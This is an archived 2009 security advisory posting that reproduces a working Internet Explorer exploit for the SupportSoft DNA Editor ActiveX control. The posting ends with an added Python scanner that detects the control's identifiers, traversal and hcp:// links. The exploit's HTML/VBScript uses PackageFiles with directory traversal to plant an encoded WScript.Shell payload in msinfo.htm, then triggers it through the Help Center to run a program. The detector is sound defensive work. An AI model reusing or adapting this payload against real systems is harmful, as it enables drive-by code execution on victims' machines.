SECURITYVULNS:DOC:21447
Mar 09, 2009

SupportSoft DNA Editor Module (dnaedit.dll v6.9.2205) remote code execution exploit (IE6/7)


<!-- SupportSoft DNA Editor Module (dnaedit.dll v6.9.2205) remote code execution exploit (IE6/7)
by Nine:Situations:Group::bruiser

 vendor url: http://www.supportsoft.com/
 our site: http://retrogod.altervista.org/

 details:
 CLSID: {01110800-3E00-11D2-8470-0060089874ED}
 Progid: Tioga.Editor.1
 Binary Path: C:\Programmi\File comuni\SupportSoft\bin\dnaedit.dll
 KillBitted: False
 Implements IObjectSafety: True
 Safe For Initialization (IObjectSafety): True
 Safe For Scripting (IObjectSafety): True

 vulnerabilities, discovered two months ago:
 insecure methods: Packagefiles() - remote file overwrite, directory traversal, *script injection* and ... a crash (investigating on this one)
                   SaveDna() - remote file creation, directory traversal
                   AddFile() - remote cpu consumption
                   SetIdentity() - remote file creation

 This dll was present inside the SupportSoft ActiveX Controls Security Update for a previous buffer overflow vulnerability,
 see: http://secunia.com/advisories/24246/
 My download url was: http://www.supportsoft.com/support/controls_update.asp
 actually unreachable
 see also: http://www.securityfocus.com/archive/1/archive/1/461147/100/0/threaded
 Well, they probably patched by marking them unsafe for initialization (I see that the ScriptRunner module suffers from a
 buffer overflow bug in the Evaluate() method...) but they gave you another vulnerable control...

-->
<HTML>
<OBJECT classid='clsid:01110800-3E00-11D2-8470-0060089874ED' width=1 height=1 id='DNAEditorCtl' />
</OBJECT>
<SCRIPT language='VBScript'>
<!--
sh="<HTML><SCRIPT LANGUAGE=VBScript>" + unescape("Execute%28unescape%28%22Set%20s%3DCreateObject%28%22%22WScript.Shell%22%22%29%250D%250As.Run%20%22%22cmd%20%252fc%20start%20calc%22%22%22%29%29") + "<" + Chr(47) + "SCRIPT><" + Chr(47) + "HTML>"
'file path is injected in msinfo.htm, you can see the code with a hex editor, some limit with number of chars, some problem with newlines, resolved with vbscript code evaluation by Execute(), a popup says Unable to post… click Ok or close it and you are pwned
DNAEditorCtl.PackageFiles sh + "../../../../../../../../../WINDOWS/PCHEALTH/HELPCTR/System/sysinfo/msinfo.htm"
'launch the script and calc.exe through the Help and Support Center Service
document.write("<iframe src=""hcp://system/sysinfo/msinfo.htm"">")
-->
</SCRIPT>

original url: http://retrogod.altervista.org/9sg_supportsoft_ce_l_hai_nel_dna.html
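
Detection sketch for the indicators listed in the advisory above. This is an added example, not part of the original advisory or of any SupportSoft code: a content scanner for proxy or mail gateways that flags pages which instantiate the control by CLSID or ProgID, call one of the four listed methods, carry traversal sequences, or reference hcp:// URLs. The rule names, the block/review/clean verdicts and the sample pages are assumptions made for this example.

```python
import re
from urllib.parse import unquote

# Identifiers copied from the advisory text above.
CLSID = "01110800-3E00-11D2-8470-0060089874ED"
PROGID = "Tioga.Editor.1"
METHODS = ("PackageFiles", "SaveDna", "AddFile", "SetIdentity")

# Rule names are this example's own labels (assumption).
RULES = {
    "clsid": re.compile(r"clsid\s*:\s*\{?" + re.escape(CLSID) + r"\}?", re.I),
    "progid": re.compile(re.escape(PROGID), re.I),
    "method": re.compile(r"\.\s*(" + "|".join(METHODS) + r")\b", re.I),
    "traversal": re.compile(r"(\.\.[\\/]){2,}"),
    "hcp_url": re.compile(r"hcp://", re.I),
}

def scan(html):
    """Return sorted rule names matching the raw or percent-decoded text."""
    text = html + "\n" + unquote(html)
    return sorted(name for name, rx in RULES.items() if rx.search(text))

def verdict(html):
    """'block' if the control is instantiated, 'review' if only
    secondary indicators appear, otherwise 'clean'."""
    hits = scan(html)
    if "clsid" in hits or "progid" in hits:
        return "block", hits
    return ("review" if hits else "clean"), hits

# Constructed samples with no working payload, for demonstration only.
SAMPLE_CONTROL = (
    "<object classid='CLSID:01110800-3e00-11d2-8470-0060089874ed' id='c'>"
    "</object><script language='VBScript'>c.PackageFiles \"x\"</script>"
)
SAMPLE_HELP_LINK = "<a href='hcp://system/sysinfo/msinfo.htm'>System info</a>"
SAMPLE_BENIGN = "<html><body><p>Quarterly report</p></body></html>"

if __name__ == "__main__":
    for name, page in (("control", SAMPLE_CONTROL),
                       ("help link", SAMPLE_HELP_LINK),
                       ("benign", SAMPLE_BENIGN)):
        print(name, verdict(page))
```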